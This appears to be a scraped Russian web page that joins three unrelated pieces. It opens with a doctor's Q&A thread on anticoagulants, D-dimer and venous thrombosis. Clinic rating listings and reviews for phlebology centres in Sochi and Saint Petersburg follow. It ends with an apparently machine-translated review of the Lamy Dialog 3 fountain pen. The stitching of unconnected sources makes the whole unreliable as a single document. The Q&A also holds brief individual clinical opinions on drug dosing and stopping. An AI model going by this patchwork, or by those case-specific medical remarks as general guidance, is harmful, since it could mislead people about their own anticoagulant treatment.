1 триместр), я снова пошла к гематологу, она велела перейти на 0.4 Клексан через день( поэтому после 2 доз 1 день я пропустила). Но на этом я не успокоилась и сдала еще раз в третьей лаборатории ПВ 10,6 (9,5 — 11,5), МНО 1,03 (0,93 — 1,16), протромбин по Квику 95,8 (79-118), фибриноген 2,2 (1,95 — 3,4), ачтв 24,0 (22,1-28,1), ТВ 14,3 (14-21), д-Димер 3979 нг FEU|мл. И сегодня мне идти абсолютно не к кому, тк гематолога нет до пн, я вспомнила, что писала вам при проблемах с венами, и что у вас были публикации по Д-димеру. Подскажите, если это возможно,как мне быть? Мне увеличить дозу или вообще забыть про д-димер, смотреть только на ачтв и остальные показатели коагулограммы? Пугает , что были тромбофлебиты, что ачтв и ТВ на нижних границах нормы , ну и такой рост д-димера тоже очень пугает. Заранее спасибо за любой ответ

Анализы тут ни при чем. Факт того, что у Вас 2 раза был тромбофлебит (даже на почве варикозной болезни) автоматически Вас относит к группе высокого риска повтора венозного тромбоза, который может произойти не только в поверхностных, но и в глубоких венах. И в такой ситуации антикоагулянты показаны весь срок беременности и 6 недель после нее. Дозировка определяется по весу на момент наступления беременности и степени риска рецидива тромбоза. Подробнее описано здесь: https://ilyukhin.info/articles/profilaktika_trombozov_u_beremennykh

Контроль коагулограммы и уровня Д-димеров абсолютно лишен смысла.

Добрый день, спасибо большое за ответ

Здравствуйте Евгений Аркадьевич! Диагноз варикоз первой степени. Сколько времени применять Детралекс 1000? У нужен ли дополнительно ксарелто? И в какой дозировке?

Не знаю. Смотря с какой целью и по какому поводу назначаются эти препараты. Варикоз они не лечат.

Ответить

Здравствуйте Евгений Аркадьевич ! Оперировался в федеральном центре ,замена тазобедренного сустава. После операции появился острый берцовый флеботромбоз справа.Лечащий врач прописал ривароксабан 20 г. в течение 3х месяцев.Можно ли при отсутствии на дуплексе предыдущей проблемы ,прекратить пить ривароксабан .

При подтвержденном на дуплексном сканировании диагнозе «тромбоз глубоких вен» минимальный срок антикоагуляции — 3 мес, даже если тромбы полностью быстро лизировались (растворились). 

Ответить

Добрый день, подскажите пожалуйста, год назад перенесён Ковид, сейчас анализы: Протромбіновий час — выше нормы, Протромбіновий індекс — ниже нормы, д- димер повышенный в два раза. Можно ли пить Ксарелто?

Необходимость приема антикоагулянтов не определяется по анализам.

Ответить

Евгений Аркадьевич,подскажите .принимал после ушиба руки и ампутации двух пальцев ксарелто 20мг.принимал 28 дней.через сколько препарат полностью выводится..и можно ли через сутки после окончания приема ксарелто употреблять алкоголь т.к.свадьба.

Да в общем-то алкоголь не возбраняется в разумных количествах.

Ответить

Здрастуйте подскажите пожалуйста. Принимаю ксарелто 10мг для профилактики перед вакциной. Могу ли я его резко бросить принимать?

Антикоагулянты перед вакцинацией не требуются. Ксарелто при необходимости просто перестать принимать.

Ответить

Здравствуйте, диагноз острый тромбоз БПВ правой голени, приток. Лечение комп.бинтование, клопидогрел 75, Кардиомагнил 75, Гепариновая мазь, компрессы .компрессы 10 дн., все остальное на 2 месяца. Как вы считаете, достаточно этого лечения? И, достаточно-ли бинтования до колена (тромб на 5 см.ниже колена) или нужно бинтовать выше? Спасибо.

Совмешать два препарата одного класса дезагрегантов не рекомендуется, дезагреганты (аспирин, клопидогрел) вообще не рекомендуются при лечении венозных тромбозов, при локализации тромбов только в притоках БПВ обычно антитромботическую терапию можно не проводить. Получите «второе мнение» по Вашему случаю очно.

Ответить

Евгений Аркадьевич, добрый день! Месяц назад после внутривенного наркоза у меня заболела вена, мазала троксевазином, боль прошла, но уплотнение осталось. Обратилась к флебологу спустя месяц после вновь появившегося дискомфорта вследствие физ нагрузок на руку. Диагноз по узи: постинъекционный сегментарный окклюзивный тромбоз латеральной Вены вк на участке от локтевой ямки до верхней трети плеча. Назначено: компрессионный рукав 2 класса на 2 месяца, троксевазин гель, флебодиа и тромбо асс. Я сейчас так же прохожу лечение обострения эрозивного гастрита. Можно ли в моем случае обойтись без приёма тромбо асс и обязательно ли ношение компресс трикотажа? Когда можно приступать к занятиям спортом? Заранее благодарю за ответ.

Не вижу смысла в антитромботической терапии при катетрном тромбозе через месяц. Уплотнение может и даже должно сохраняться долго, оно опасности не представляет. Компрессия нужна только если есть или появляется при нагрузках отек. Но если есть отек конечности — то должна быть вовлечена более крупная вена, и тогда это совсем другая история.

Спорт и нагрузки — обычно возможности оцениваем по реакции руки. Можно то, что она позволяет.

Ответить

Здравствуйте. Беспокоюсь за мужа. Переболел пневмонией, врач назначил пить Ксарелто 10 мг курс лечения — до месяца . У него больной желудок и хронический гайморит. Пьёт его 18-й день, чувствует себя не очень хорошо. Сегодня сказал :»-Я чувствую как кровь с огромной скоростью бежит по венам и конечности немеют». Можно ли прекратить пить этот препарат?

Вопрос не для заочного разбирательства и советов.

Ответить

Евгений Аркадьевич, добрый день. Подскажите пожалуйста, как определить у себя тромбоз? Анализы, исследования. После перенесённого( легкая форма) Ковид, очень сильно болят икроножные мышцы. Как после спорта. Заранее спасибо за ответ.

Подскажите пожалуйста, как определить у себя тромбоз? 

Если речь о тромбозах вен ног, то самый надежные способ — приобрести ультразвуковой аппарат и сделать исследование сосудов. Во всяком случае -именно это «золотой стандарт» диагностики. 

Как заподозрить тромбоз? Боли в икрах, особенно в обеих — не признак тромбоза. Основной — вдруг развившийся сильный отек одной конечности. Да, бывает начало тромбоза с болей в голени, но в каком случае обращаться к врачу, а в каком нет — это каждый решает для себя сам.

Спасибо за ответ. Благодарна

Добрый день, Евгений Аркадьевич! В 2017 году перенес тромбоз глубоких вен ног и ТЭЛА. С тех пор пью Ксарелто 20 мг для профилактики тромбозов/ТЭЛА. Можно ли заменить с этой целью Ксарелто на клопидогрел? Спасибо!

После единственного эпизода тромбоза крайне редко требуется прием антикоагулянтов больше года. И если требуется — обычно используются редуцированные дозы (20 мг — это много). Дезагреганты (клопидогрел) не могут заменить антикоагулянты, они неэффективны в профилактике венозных тромбозов.

Ответить

Здравствуйте! Уважаемый Евгений Аркадьевич. 25 дней от начала диагностирования covid. Лечилась дома. В течение первой недели была температура. С самого начала терапевт назначил ксарелто 10 мг. Через несколько недель появились синячки на ногах, к концу третьей недели стало ощущаться напряжение в икрах ног, болевые ощущения. Температуры и кашля нет, беспокоит давление на 10 мм выше привычного. Давление лабильное. То снизится, то повысится. Звон в ушах, головная боль. Как определить, когда прием ксарелто можно прекратить? Какой объективный анализ является критерием для прекращения? Какой препарат принимать для мягкого снижения давления? Если принимать препарат, чтобы плавно снизить давление, то какой можно сочетать с приемом ксарелто без всяких опасений. Делать ли разницу во времени приема двух препаратов? Почему, на Ваш взгляд, появилась информация о том, что прекращение приема ксарелто может повысить риск тромбообразования и его нужно отменять по какой-то схеме. Заранее признательна за возможность получить Ваше личное мнение по каждому волнующему меня вопросу. С уважением и наилучшими пожеланиями.

Здравствуйте. Ваши вопросы в большинстве своем вне моей компетенции. Антикоагулянты при амбулаторном лечении ковид-инфекции обычно не нужны, назначаются они при наличии у конкретного человека каких-то особых факторов риска тромбоза. Это определяется не по анализам, а путем опроса о имеющихся и перенесенных заболеваниях. Назначаются антикоагулянты (если уж они нужны) на весь период болезни, никаких схем отмены не существует. Отмена антикоагулянта не повышает риск тромбоза.

Ответить

Здравствуйте доктор. Мне 47 лет. Спортом не занимаюсь. 3 недели назад на правой ноге в области икроножной мышцы вздулась Вена прямо посередине. Через неделю сзади выше колена (в нижней части бедра )появилась отечная зона с гиперемией размером с кулак которая жутко чешется и болит. Общее самочувствие в норме. Надо ли идти на Доплер вен и какие анализы сдать что бы идти к специалисту? Спасибо большое.

Нужны ли какие-то инструментальные исследования или анализы решает врач на приеме. Если Вы видите явные внешние изменения вен — можно предварительно пройти дуплексное сканирование вен или обратиться к флебологу, который сам на приеме делает это исследование — тогда вопрос по венам будет сразу прояснен.

Ответить

03.09.2021г. «Острый тромбоз глубоких вен левой нижней конечности(ПБВ, головка тромба без флотации). Рекомедована терапия, в том числе Ксарелто( 6 мес.) в сочетании с Детралексом. Вопрос как долго принимать Детралекс в данной комбинации и предпочтительное время приема(утро, обед,вечер). Ксарелто принимаю утром во время еды.

Детралекс не имеет значения в лечении тромбоза.

Спасибо, Евгений Аркадьевич.

Здравствуйте, Евгений Аркадьевич. При проведении анализа ПЦР тромбофилия выявлено гомозиготное носительство гена Серпин1, PAI-1 (антагонист тканевого активатора плазминогена). Вкупе еще гетерозиготное носительство гена F13A1 (фактор XIII сворачивания крови). О каком риске тромбообразования это может говорить? К какому специалисту следует обратиться? Гомоцистеин — возрастная норма. УЗИ сосудов конечностей — норма. Сдавали из-за того, что уже 6-й месяц после ковида повышенные цифры Д-димера, если не принимаем антикоагулянт. Спасибо.

О каком риске тромбообразования это может говорить?

Ни о каком. Такой же риск, как у всех здоровых людей. 

К какому специалисту следует обратиться?

Ни к какому. И точно не к тому, кто это назначил.

Уровень Д-димеров — неспецифический показатель. Это не предиктор тромбоза. В описанной ситуации он скорее всего говорит о том, что перенесена болезнь. Оставьте Д-димеры в покое. 

Благодарю за ответы

Добрый день. Девушка, 29 тел. У меня диагностировали ТГВ после перенесённого короновируса. Принимаю Ксарелто 20 мг 1 раз в день. На этом фоне усилились выделения во время менструации. Можно ли принимать железо параллельно с Ксарелто? Спасибо за ответ.

Можно

Ответить

Добрый день.По назначению врача отделения гемостаза много лет(150)принимала варфарин в дозе 10 мг.Покрылась вся синяками.Сосудистый хирург перевел меня на ксарелто 20 мг.Принимаю 4 месяца. В анамнезе тромбоз рецидивирующей.Сдала анализ-ПТИ 78.9 АЧТВ 34.6 Фибриноген 4 МНО 1.2.Это норма.?записалась к сосудистому хирургу.т.к чувствую движение крови по ногам и боли преходяшие в венах.Спасибо!

Ксарелто принимается в фиксированной дозе и не требует лабораторного контроля.

Благодарю за ответ.

Отзывы 141 пациента о центре флебологии и лазерной хирургии в Сочи

Пациент
+7-962-88XXXXX

5 мая в 09:43

+2. 0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (2)

Посетили в апреле 2022

ул. Виноградная, д. 2/3

Пациент
+7-963-16XXXXX

27 февраля в 19:20

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (2)

Посетили в октябре 2021

ул. Виноградная, д. 2/3

Пациент
+7-989-75XXXXX

19 февраля в 11:33

+2. 0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (2)

Посетили в феврале 2022

ул. Виноградная, д. 2/3

Пациент
+7-952-32XXXXX

8 февраля в 10:31

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (2)

Посетили в январе 2022

ул. Виноградная, д. 2/3

Пациент
+7-918-00XXXXX

17 января в 15:55

Проверено (2)

Посетили в январе 2022

ул. Виноградная, д. 2/3

Пациент
+7-918-30XXXXX

2 декабря 2021
в 15:36

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в ноябре 2021

ул. Виноградная, д. 2/3

Пациент
+7-918-90XXXXX

15 ноября 2021
в 16:35

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в ноябре 2021

ул. Виноградная, д. 2/3

Пациент
+7-918-00XXXXX

25 мая 2021
в 15:41

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в мае 2021

ул. Виноградная, д. 2/3

Пациент
+7-918-40XXXXX

18 мая 2021
в 14:32

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в апреле 2021

ул. Виноградная, д. 2/3

Пациент
+7-905-26XXXXX

21 апреля 2021
в 17:11

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в марте 2021

ул. Виноградная, д. 2/3

Пациент
+7-918-41XXXXX

14 апреля 2021
в 12:55

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в марте 2021

ул. Виноградная, д. 2/3

Пациент
+7-928-45XXXXX

25 февраля 2021
в 12:06

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в феврале 2021

ул. Виноградная, д. 2/3

Пациент
+7-923-44XXXXX

17 февраля 2021
в 18:55

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в феврале 2021

ул. Виноградная, д. 2/3

Пациент
+7-918-40XXXXX

30 ноября 2020
в 13:48

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в ноябре 2020

ул. Виноградная, д. 2/3

Пациент
+7-988-41XXXXX

30 сентября 2020
в 00:39

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в сентябре 2020

ул. Виноградная, д. 2/3

Пациент
+7-909-17XXXXX

12 августа 2020
в 14:40

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

Посетили в августе 2020

ул. Виноградная, д. 2/3

Пациент
+7-906-43XXXXX

26 августа 2019
в 22:49

+0.8 хорошо

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Хорошо

Хорошо

Плохо

Хорошо

Отлично

Проверено (1)

Посетили в августе 2019

ул. Виноградная, д. 2/3

Пациент
+7-938-49XXXXX

28 марта 2019
в 17:45

+2.0 отлично

Здание и помещения

Оборудование и медикаменты

Отношение медперсонала

Комфорт пребывания

Время ожидания

Отлично

Отлично

Отлично

Отлично

Отлично

Проверено (1)

ул. Виноградная, д. 2/3

Пациент
+7-918-54XXXXX

29 сентября 2018
в 11:14

Автор не подтвердил факты из отзыва документами, поэтому отзыв аннулирован. Восстановим, если получим подтверждение. Если вы автор, позвоните нам 8 (800) 600-30-28.

ул. Виноградная, д. 2/3

Гость

7 сентября 2017
в 19:18

-2.0 ужасно

ул. Виноградная, д. 2/3

Гость

13 октября 2016
в 10:53

+2.0 отлично

ул. Виноградная, д. 2/3

Отзывы о Центре Флебологии на Парадной – Санкт-Петербург – НаПоправку

Центр Флебологии, специализированная клиника по лечению заболеваний вен

Профиль подтверждён.

Клиника самостоятельно управляет своей страницей.

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Врач хороший, всё объяснил, рассказал, собираюсь теперь на операцию к нему.

16 дней назад

Отзыв о враче

проктолог

лимфолог

флеболог-хирург

флеболог

Взрослый

20 дней назад

Отзыв о враче

проктолог

лимфолог

флеболог-хирург

флеболог

Взрослый

Была у хирурга Волковой, мне очень понравилась как специалист, получили полную информацию. Рекомендую как грамотного врача.

месяц назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

месяц назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

месяц назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

2 месяца назад

Отзыв о враче

проктолог

лимфолог

флеболог-хирург

флеболог

Взрослый

Я в восторге от этого врача! Елена Сергеевна замечательный специалист. Она мне посоветовала пройти дополнительное обследование, дала подробные рекомендации, которым я следую. Все, что я хотела от нее — я получила. Как только все сделаю, снова обращусь для дальнейших действий. О клинике ничего не скажу отрицательного, мне также все устроило, понравилась работа персонала.

3 месяца назад

Отзыв о враче

лимфолог

флеболог-хирург

флеболог

Взрослый

После операции мне рекомендовали пройти УЗИ через пару недель, я обратилась в центр Флебологии. Мне сделали дуплексное сканирование вен нижних конечностей, доктор внимательный, вежливый, все хорошо посмотрел, и сказал, что у меня все хорошо и нет никаких тромбов и послеоперационных осложнений. Были даны рекомендации носить компрессионный трикотаж, мне все очень понравилось.

3 месяца назад

Отзыв о враче

флеболог-хирург

флеболог

Взрослый

Пока медсестра делала узи вен. У данного доктора уже была заготовлена схема лечения, с ценами и информацией о скидках. Вопросы игнорировал . Видно было, что заинтересован в скорейшем моем согласии на операцию и склеротерапию. Использовал тактику запугивания😬 Перед выходом встретив в коридоре в очередной раз напомнил что будет если отказаться от процедур. В Вашей клинике была не один раз, и делала дорогостоящие процедуры . Но данный «врач» отбил желание снова к Вам обратиться . От слова СОВСЕМ. И если честно, я сомневаюсь вообще в адекватном заключении данного «врача». Для спокойствия своего обязательно надо перепроверить в другом месте 😳

3 месяца назад

Отзыв о враче

кардиохирург

флеболог-хирург

флеболог

Взрослый

Хотелось бы выразить огромную благодарность хирургу-флебологу Прозоровскому Сергею Тихоновичу за его золотые руки и сердце. Операция, которую он мне выполнил, спасла мне жизнь и подарила надежду на полноценную дальнейшую жизнь без мучительной боли в ногах. От всего сердца желаю Сергею Тихоновичу крепкого здоровья и как можно дольше оставаться на своем посту, даря людям радость выздоровления. Спасибо всему трудовому медицинскому персоналу за внимательное отношение и доброжелательность.

4 месяца назад

Отзыв о враче

флеболог-хирург

флеболог

Взрослый

Все рекомендации врача флеболога сводились «срочно операция, больше ничего не поможет». Мою робкие попытки выяснить какие профилактисеские меры нужно предпринять для недопущения такой » Ужасающей» ситуации на второй ноге разбивались о безапелляционные заявления в мизантропической манере «Диета -ноль! Ходьба -ноль!» и никаких рекомендаций от врача, кроме, конечно, немедленного «лазера», а потом » уколы» и, разумеется компрессионное белье ТОЛЬКО в их магазине. Сппсибо доктору Васину за такой интересный опыт выкачивания денег из больных, до сих с таким не встречалась. Разумеется я пойду к другому врачу, послушать другое мнение и в этой клинике никаких процедур делать не буду в любом случае.

4 месяца назад

Отзыв о враче

флеболог-хирург

флеболог

Взрослый

К сожалению, мне не понравился прием. С какими вопросами пришла, с такими и ушла. Отношение доктора вроде и доброжелательное, но какое-то снисходительное. Впечатление, что он не воспринимает твои жалобы всерьез. Поэтому даже и не стала все вопросы задавать, когда поняла, как он на них отвечает. На узи были обнаружены проблемы, но никакого лечения назначено не было. Рекомендаций тоже не дано, только наблюдать. Сейчас проблема немного усугубилась и надо снова искать врача. Возможно, как оперирующий хирург врач хорош, но на консультации общего языка не нашли.

5 месяцев назад

Отзыв о враче

проктолог

лимфолог

флеболог-хирург

флеболог

Взрослый

Обследование прошло шикарно, мне все понравилось, поэтому я буду продолжать лечение. УЗДГ вен нижних конечностей мне проводила Елена Сергеевна, она сделала все профессионально, быстро. Могу сказать, что она квалифицированный врач, выдала мне заключение, предоставила море информации и назначила лечение. Елена Сергеевна интересовала меня как лимфолог, когда я записывалась, просила, чтобы администраторы подсказали хорошего специалиста, и рекомендация сотрудников оказалась мне полезна. В центре все отлично, встретили дружелюбно. Хочу отметить, что медсестры там работают очень хорошие, у них я делала процедуры, все было замечательно, даже успели подружиться.

5 месяцев назад

5 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Посетив Центр Флебологии в Спб по адресу Парадная ул 3 корп 2, в очередной раз разочаровалась в работе специалистов дорогих клиник! Они заточены не на расположение пациента, грамотную консультацию и решение проблемы, сколько на заманивание на долгосрочное лечение. Врач хирург Густелев ЮА Врач узд Чиквиладзе ЮГ 1. Оплата До встречи с врачом. 2. Узи делали стоя, в целом я довольна что прошла это обследование. Хотя проблем у меня нет. Пришла только ради консультации — стала появляться сосудистая сеточка на бедре после родов, которая еле заметна и меня не напрягает. По узи все хорошо. 3. После узи врач давал анализ. Ни на один мой вопрос не ответил. Но зато сразу озвучил цену на лечение. На мои последующие вопросы о противопоказаниях и рекомендациях тоже умолчал. Все ответы приходилось просто вытаскивать из него. Сказал — лазер и компрессионное белье. И все. Что такое обёртывание он не знает, что такое щётка для сухого массажа тоже, про баню и тд не комментировал совсем. Я считаю, что помимо лазера есть процедуры которые могут либо усугубить ситуацию, хотелось о них узнать, либо наоборот, улучшить. Пустой взгляд, которому было совершенно все равно. Он просто сказал приходите на лазер к нам и все. Цена такая. 1. Консультации я не получила вообще 2. Меня даже не расположили к себе 3. Приём вместо обещаных 40минут был 20минут максимум вместе с узи. При условии что у меня было много вопросов… Если у вас действительно проблемы, эту клинику не посоветую никому. Потому что первое что волнует сотрудников — это ваши деньги, а не здоровье!

5 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Внимательный врач

6 месяцев назад

Отзыв о враче

проктолог

лимфолог

флеболог-хирург

флеболог

Взрослый

7 месяцев назад

Отзыв о враче

врач УЗД

Взрослый

В Центр Флебологии я обращалась к сосудистому хирургу, а также к специалисту УЗИ. Исследование мне проводила Самышкина Екатерина Николаевна. Могу сказать, что Екатерина Николаевна — чудесный доктор, ее работу я оцениваю на отлично

7 месяцев назад

Отзыв о враче

врач УЗД

Взрослый

Чиквиладзе Юлия Гурамовна принимала меня в Центре Флебологии. Мне настолько все понравилось, что хочу отметить отдельно этого специалиста. В этой клинике я посещала и других врачей, могу сказать, что все они профессионалы своего дела, мне повезло, что обратилась именно туда.

7 месяцев назад

Отзыв о враче

флеболог-хирург

сосудистый хирург

флеболог

ангиолог

Взрослый

Приемом я осталась очень довольна, все хорошо и адекватно, врач был очень приветлив по отношению ко мне. К доктору планирую снова записаться, просто сейчас жду, когда допью таблетки, сдам анализы, чтобы идти на прием с результатами. Также я ношу компрессионный трикотаж, это продлится полгода. Сейчас чувствую себя лучше, но пока не идеально. Я массажист, мне важно как можно быстрее восстановить здоровье, для меня рука — это жизнь.

7 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Врач,который всегда поможет и сделает человека счастливым.Спасибо за профессионализм.

8 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Врач ответил на все вопросы, проблема решена, рекомендую.

8 месяцев назад

Отзыв о враче

кардиохирург

флеболог-хирург

флеболог

Взрослый

Потрясающий доктор!!!!!! Операция 5,5 часов. Спасибо!!!!

9 месяцев назад

Отзыв о враче

флеболог-хирург

флеболог

Взрослый

9 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

Проходила лечение с декабря прошлого года по апрель 2021 года у Крылова СА в центре флебологии на Парадной. Осталась очень довольна конечным результатом. Убирала сосудистые сеточки (на одной ноге после беременности у меня они были сплошь), на вторую ногу делала эвлк. Врач очень корректный, внимательный и последовательный, а главное — профессионал своего дела. Честно говоря, думала, что уже никогда не смогу надеть короткую юбку летом, но результат превзошёл мои ожидания. Однозначно рекомендую к посещению данную клинику и Крылова СА

9 месяцев назад

Отзыв о враче

флеболог-хирург

сосудистый хирург

флеболог

ангиолог

Взрослый

10 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

10 месяцев назад

Отзыв о враче

сосудистый хирург

флеболог-хирург

ангиолог

флеболог

Взрослый

10 месяцев назад

Отличный центр! Хорошие специалисты!

год назад

Отзыв о враче

кардиохирург

флеболог-хирург

флеболог

Взрослый

О Сергее Тихоновиче говорят среди своих, что он «врач от Бога». Показывала ему своего отца несколько лет назад, думали уже вырезать надо Вены, но он тщательно осмотрел и сказал, что бегать и бегать, при соблюдении такого же активного образа жизни. Знакомый главврач к него своего отца на операцию клал. Все успешно и замечательно. Это лишь подтверждает профессионализм Сергея Тихоновича. Жаль к нему на обычный приём не попасть, только по назначению на операцию.

год назад

Обзор Lamy Dialog 3 — Nib & Muck

Недавно я просматривал Instagram — вероятно, избегая человеческого общения в ожидании друга — и был очарован фотографиями Пима (он же ilovechubbyunicorns) его Lamy Dialog 3. Я слышал об этом , но она никогда не попадала мне в поле зрения как «обязательная» ручка для меня.

Страсть и любовь к этому пишущему инструменту вылились из постов Пима и пробудили во мне интерес. Потом я увидел Dialog 3 ВЕЗДЕ. Объявления в Интернете. В других лентах Инсты. В моих снах, когда я пытался уснуть. Меня необъяснимо тянуло к нему, как Джульетту к ее Ромео.

Вселенная выровнена; Я получил слегка помятый Dialog 3 через обмен в группе Fountain Pens UK на Facebook. Подробнее об этом позже.

Вот мои мысли о моем новом кавалере. Кажется, нам с Лами было суждено стать влюбленными звездами…

Lamy Dialog 3: My Romeo

Вид с балкона Джульетты – корпус и механизм выдвижного пера

Lamy Dialog 3 — первая настоящая ручка в форме сигары I’ видел. Он имеет диаметр 13 мм от носа до конца, с низким профилем, подпружиненной клипсой и минималистичным логотипом Lamy, выгравированным посередине серебряно-палладиевого корпуса. Он также доступен в черном или белом цвете фортепиано, так как Лами, кажется, любит цвета волшебных палочек.

Это громоздкий зверь размером 14 см, когда перо не убрано (почти 16 см, когда оно убрано), и весом 45 г без чернил и 47 г с чернилами. По сравнению с 27-граммовым макролоном Lamy 2000, Dialog 3 действительно здоровенный. В руке он кажется прочным и хорошо сбалансированным, но он настолько тяжелый, что я легко устаю после нескольких страниц письма. Короткие встречи на балконе Джульетты работают лучше всего ;).

Это хеффер!

Отличительной особенностью этой ручки является выдвижной механизм пера. Поворот нижнего ствола вправо открывает круглую дверцу пера, и перо из 14-каратного золота легко вынимается, как хорошо вытащенная рапира из ножен. Это великолепно гладкое и завораживающее зрелище; Я часами сидел, наблюдая, как он открывается и закрывается. (Нет, правда есть.)

Завораживающий механизм

Но, несмотря на стильное изящество, он не может конкурировать с Pilot Vanishing Point/Capless по простоте использования. Механизм Lamy требует двух рук, в то время как VP — это щелчок одной рукой. Мне также было трудно вспомнить, в какую сторону поворачивать ствол, несмотря на то, что у меня есть степень и степень магистра, и я нечаянно несколько раз разбирал ручку целиком.

При этом мой Lamy Romeo выигрывает по внешнему виду и клипса у него менее навязчивая, чем у VP. Так что Лами все еще может шептать мне милые глупости на моем балконе в любое время.

ПОКА, Ромео пришлось сделать пластическую операцию, прежде чем мы начали трястись…

Визит к аптекарю – ремонт Lamy

Когда я впервые получил Lamy Dialog 3, он был побит (вероятно, в Капулетти против Монтегю) и имел вмятину на конце пера, которая мешала открывающему механизму. Я был убежден, что смогу исправить это и сэкономить 180-235 фунтов стерлингов на новой ручке. Электронное письмо и письмо в Lamy Germany позже, ремонтная команда Lamy предложила исправить это для меня бесплатно, если я оплачу почтовые расходы. Результат!

Итак, примерно за пять фунтов и две недели Лами заменил весь ствол, настроил мое перо и полностью почистил его. Повторяю, за ПЯТЬ АНГЛИЙСКИХ ФУНТОВ. Почему я говорю вам это? Потому что некоторые любители ручек не решаются обращаться к производителям ручек с запросами на ремонт из-за стоимости. Я обнаружил, что большинство людей, занимающихся изготовлением ручек, более чем рады помочь, а иногда даже бесплатно! Не позволяйте своей единственной настоящей любви томиться на дне ящика стола; покажите ему TLC, отправьте его производителю и купите ему букет роз, когда он приедет домой.

После пластической операции

Первый поцелуй Перо и письмо

Я обожаю перья Lamy, от стального EF на моем Safari до перо M 14k с капюшоном на моем Lamy 2000. The Dialog 3 14k ниб не исключение. Я люблю: двухцветный вид; возможность заменить его другими перьями Lamy, поскольку они выполнены в том же стиле, что и в Safari и AL Star; и как пишет. Она более зубастая и чуть более сухая, чем мой Lamy 2000, но заметно более гладкая, чем ее стальные аналоги. Не ожидайте отскока или изменения линии, которые вы обычно найдете с перьями Pilot или Sailor, но ожидайте отличного ежедневного ведения заметок. Твердые шесть из десяти по показателю качества поцелуя (или письма).

Одно предостережение; используйте влажные чернила, так как механизм закрытия пера не полностью предотвращает высыхание пера. Я использовал Diamine Ancient Copper, которые являются более сухими чернилами, и через несколько дней у меня были проблемы с началом работы, когда я брал ручку в руки, а иногда и в середине сеанса письма. Я бы все равно поцеловал его.

Зубчик, более сухой наконечник

Хорошая рабочая лошадка, но не модная

O’Romeo – LOVE:

  • Великолепный внешний вид
  • Уникальный механизм с выдвижным наконечником
  • Прочная и продуманная конструкция
  • Тонкий, но простой в использовании зажим
  • Надежный сменный наконечник 14k
  • Исключительное обслуживание клиентов Lamy

Чума на оба ваших дома – НЕНАВИСТЬ:

  • Цена – от 185 до 235 фунтов стерлингов, это дорого, когда Pilot VP дешевле и предлагает больше функций
  • Механизм громоздкий в использовании и требует двух рук (или трех, если у вас есть одна)
  • Очень тяжелый, что делает его болезненным при длительном письме
  • Периодически затрудненный запуск и высыхание пера

Вердикт

Пообещаю ли я свою бессмертную (и самоубийственную!) любовь моему Lamy Dialog 3 Romeo?

Нет. Вообще-то не стал бы.

Это интересная ручка, приятная в использовании и отличная для демонстрации другим, но я просто не тянусь к ней за моей Lamy 2000 или моим Pilot VP. Dialog 3, очевидно, хорошо собран, но я рекомендую вам попробовать перед покупкой, потому что вес подойдет не всем, и вам нужно четко понимать, для чего вы хотите его использовать.

